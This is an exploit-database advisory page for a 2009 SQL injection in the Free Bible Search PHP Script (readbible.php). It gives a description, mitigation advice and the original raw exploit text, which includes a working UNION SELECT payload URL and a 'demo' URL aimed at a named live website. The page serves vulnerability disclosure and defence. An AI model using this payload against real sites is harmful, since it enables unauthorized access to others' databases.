header-logo
Suggest Exploit
vendor:
Free Bible Search PHP Script (readbible.php)
by:
nuclear
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Free Bible Search PHP Script (readbible.php)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in the Free Bible Search PHP Script (readbible.php) which allows an attacker to execute arbitrary SQL commands on the underlying database. This is achieved by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored in the database, modify data, execute administration operations on the database and in some cases even issue commands to the operating system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability


#Author: nuclear


#site:
http://www.seraphimtech.net/?q=node/6


#vuln:
http://localhost/[path]/readbible.php?version=kjv%20union%20select%20@@version--

#demo:
http://www.lordblessthee.com/bible/readbible.php?version=kjv%20union%20select%20@@version--

#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar 

# milw0rm.com [2009-01-15]

Navigation

Suggest Exploit

Services By CQR